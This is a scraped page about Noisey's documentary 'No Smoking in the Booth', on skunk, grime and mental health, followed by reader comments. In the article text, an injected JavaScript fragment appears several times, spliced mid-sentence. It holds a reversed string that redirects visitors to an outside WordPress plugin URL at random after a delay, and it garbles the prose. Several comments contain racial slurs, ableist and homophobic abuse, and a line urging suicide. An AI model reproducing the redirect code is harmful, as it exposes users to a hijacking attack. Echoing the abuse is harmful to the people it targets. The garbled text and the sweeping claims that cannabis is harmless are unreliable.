No Smoking in The Booth: A Film About Skunk, Grime and Mental Health

As part of Mental Health Awareness Week, Noisey presents ‘No Smoking in the Booth’ – a documentary about skunk, grime and mental health.

The film follows grime legend and Boy Better Know member Jammer on his personal journey toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to understand how skunk may be affecting the mental health of musicians in his scene.

The potential link between cannabis and mental health problems is a controversial subject. Here, Jammer meets scientists, dealers, support workers and musicians who have personal experience with the toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topic.

This film is part of The Noisey Guide toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Music and Mental Health. Watch the other films in this series:

A Light Went Out: A Short Film About Getting Signed:

Grounded: A Short Film About Anxiety and Ambient Music

Demons: A Short Film About Finding Solace in Music:

Reunited: A Short Film about Music and the Human Spirit

You can read more from this series right here: .

If you are concerned about the mental health of you or someone you know, talk toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Mind on 0300 123 3393 or at their website: And if you would like toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to know more about the work of Music Support you can visit them here:

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34 thoughts on “No Smoking in The Booth: A Film About Skunk, Grime and Mental Health”

  1. potlovingchef14 says:







  2. Henry Elizondo says:

    This episode was so fucking dumb…. I thought it was a joke at first….that's that Cali weed fuck boys….

  3. Max W. says:

    Thank you for doing such an excellent piece. let's educate our young people.

  4. jbmp1390 says:

    Cannabis is not giving anyone mental health probelms. Don't use that as an excuse. Cannabis is actually HELPFUL for people with mental issues. Skunk is just potent weed, and that's never hurt anyone. Can you over do it like anything else and have negative effects due to the fact that you're constantly intoxicated? Of course. But don't blame the weed for that, blame yourself for not being responsible with it. FUCK JAMMER FOR THIS ONE. I normally fuck with dude but this is pure bullshit and just him making excuses, trying to make cannabis a scapegoat for his own problems. Fuck this and fuck anyone who disagrees. Cannabis is not hurting anyone, in fact it's doing the opposite for countless millions.

  5. Robert MacNaughton says:

    This is absolute shite propaganda, "reefer madness" style. We have HUNDREDS OF THOUSANDS of daily medical and recreational users and NO psychosis. The basic ignorance on a science level shown by the UK medical establishment is astounding and in my opinion, criminal. We here in Canada are implementing full legalization next year and saying goodbye and good riddance to 95 years of racist prohibition and 40 years of a failed social international policy called "The war on drugs" . I sincerely hope that England will follow us.

  6. einapetss says:

    dunno why people start crying when anyone has an opposing view on weed. if it works for you good for you but people need to be truthful and stop this idea that its this magical universal drug thats not harmful and that every form of it suits everybody

  7. Lee O says:

    Royal College Of Psychiatrists: "Over the past few years, research has strongly suggested that there is a clear link between early cannabis use and later mental health problems in those with a genetic vulnerability – and that there is a particular issue with the use of cannabis by adolescents."

    Rethink Mental Illness: "You are more likely to develop a psychotic illness if you smoke cannabis and are 'genetically vulnerable' to mental health problems. 'Genetically vulnerable' means that you are naturally more likely to develop a mental health problem. For example if people in your family have a mental illness, you may be more likely to develop a mental health problem. But it doesn't mean that you will."

    National Institute On Drug Abuse: "Several studies have linked marijuana use to increased risk for psychiatric disorders, including psychosis (schizophrenia), depression, anxiety, and substance use disorders, but whether and to what extent it actually causes these conditions is not always easy to determine. The amount of drug used, the age at first use, and genetic vulnerability have all been shown to influence this relationship. The strongest evidence to date concerns links between marijuana use and substance use disorders and between marijuana use and psychiatric disorders in those with a preexisting genetic or other vulnerability. "

    What these quotes all have in common is they say most Cannabis users who suffer from mental illness disorders already have pre-existing genetic issues that make them likely to become mentally ill.

  8. Link Up TV | Music says:

    Very good watch
    Big up Jammer

  9. Special-T-419 NigerianPIMP says:

    im not being funny though but is jammer just smoking weed

  10. Stephen Wilder says:

    This is really dumb find another scapegoat to blame your problems on. Some people like to blame soda for all their issues in life so why don't you try that? lol or you could just claim responsibility for anything you ever do in life positive or negative drunk or sober. naw that's too hard so you just have to blame anything so it's not your fault and that's weak.

  11. EL Whoa says:

    niggas just can't hang

  12. Jacob Harris says:

    it's just weed guys. stop being pussies, or don't smoke good weed. lol, crazy…

  13. ethan read says:

    jammer is just trying to excuse his weak bars

  14. pixiechick92 says:

    Lol this dude is a fucking bitch and so are all his friends who "went trough hard times on skunk". I swear try being a heroin addict and then get back to me you little bitch.

  15. Gawda Reign says:

    This bs af, don't come to Cali with this fuck shit

  16. arbz grg says:

    wats the music at the end?

  17. Luca Pietrangeli says:

    Yo I needed to hear this. I appreciate it a lot

  18. Paradox PJ says:

    I RATE THIS and I'm a WEEDFACE , but the truth is the truth , this ain't for you , leave all the SKUNK for ME!

  19. Bike Curious says:

    Man his parents are cool

  20. Stephen Brunskill says:

    @noisey, You guys need to make a video on Piggy Banks

  21. keisha shell says:

    This was excellently put together JAMMER! Love it 100% I seen a lot of facts that I recognized when I smoked a small amount of LOAD here in the U.S.. I take it that it's the same as Skunk. Also grown in hot house conditions with chemical enhancements. Like the kid said but with me it took 6-10 mins. to kick in from the small amount in a cigarrello. I was calm then I was angry thinking of all some crazy shit that I didn't want to be thinking about. If children are smoking this its NOT GOOD its not what your weed experience suppose to be like calm relaxing not I want to FUCK SHIT UP! I believe like others have said there needs to be Fed changes from gov's around the world to stop this growing practice so we can get back to organic weed. Here in the U.S. only in the states that have legalized the usage and sale have large access to organic corps. which sucks. I will be sharing this video as an education tool for all my fam and friends to watch out for. Thanks again for putting this together.

  22. TheTrumpanzeeTrainer says:

    WHAT A LOAD OF FACT-LESS FEAR MONGERING ANTI-MARIJUANA HORSESHIT PROPAGANDA VICE. I guess when the science proves OVER AND OVER AND OVER AND OVER that Marijuana is less harmful THAN ALCOHOL, the propagandists have to resort to evidence-less, emotional Propaganda fueled by a handful of people who had "bad" experiences with Marijuana so we can pretend that is even remotely close to the norm with Marijuana users, huh Vice?? Done with this bullshit channel!

  23. PropaMusicUK says:

    Literally the stupidest propaganda I've seen, the establishment are desperate if they managed to convince Jammer to do this, skunk has nothing to do with it, Kids taking drugs or Alcohol is the problem, if your brain is still developing any substance might damage you in a psycho-active way!! Skunk has been about since the fucking 80s, skunk is not different to "organic" weed if that "skunk" is grown organically then what is your argument, it's pathetic that this kind of argument still gets any traction considering how widespread cannabis use is in the world

  24. G1tube2020 says:

    I am glad the white guy knows what he is talking about. You will have problems if you abuse anything! People get hooked on other drugs and blame the green. Some people just have mental issues.

  25. Santiago says:

    so basically all the strong bud in the USA is causing mental issues. all the bud in usa is skunk weed lol

  26. Santiago says:

    it's the same with alcohol. some people get pissed off a few beers and some people require liquor. it effects people differently. if your in your 14 and start smoking it then obviously it can effect you because your brain hasn't fully developed. don't blame the bud when things like alcohol which are legal cause way more serious health problems

  27. Hunter Ingersoll says:

    this is a fucking joke, and "skunk" is such a broad fucking term that it's retarded to call all strong weed that. these guys are the same idiots who smoke "spliffs". if you mix tobacco in with your weed you should kill yourself. grow up, just roll a blunt. and you fucking suck at rap, all of you. Rap/hip hop is an American sub culture, anywhere else in the world it's just that culture trying to mimic ours with your countries shitty twist on it. your accent sucks, you can't rap, Tim Westwood is a joke and Charlie sloth is a fucking retarded diabetic dick rider who failed at rap so he interviews them and just presses stupid mortal kombat sounds while they rap…oh and grime is the worst sounding shit I have ever heard, how about you do a study on the mental effects of grime, that shit will give the average person a mental disorder.

  28. Elliot Harrison says:

    His eye popped out like wtaf lool

  29. WoodSpirit says:

    Is this coon actually autistic? I can guarantee this chump has NOT smoked alot of weed in his life. He's talking like a complete fucking amateur. Even saying the word "skunk" is fucking cringe. Skunk is not a thing. There is good weed, and shit weed. Anyone that thinks skunk is some crazy suped up weed that's way different is dumb and definitely not s smoker. Don't make gay films like this, make the rest of us look bad. Fuck this nigger. Your parents smoked shit as fuck Ditch weed that doesn't even get grown anymore, that's why they didn't get high.

  30. Dr. Eser Ebcin says:

    why are the subtitles in English? Everyone in the documentary is speaking clear English….

  31. dieselphiend says:

    We've got 50/50 THC to CBD strains here in the US.

  32. dieselphiend says:

    Everything… in moderation.

  33. Adam Sanderson says:

    Firstly, most weed isn't 'skunk' it's a modern hydride of various strains. Second, if I drink beer I drink a pint or so. Do I drink a pint of whisky? No, I drink less. Smoke less 'skunk' and you'll be fine.

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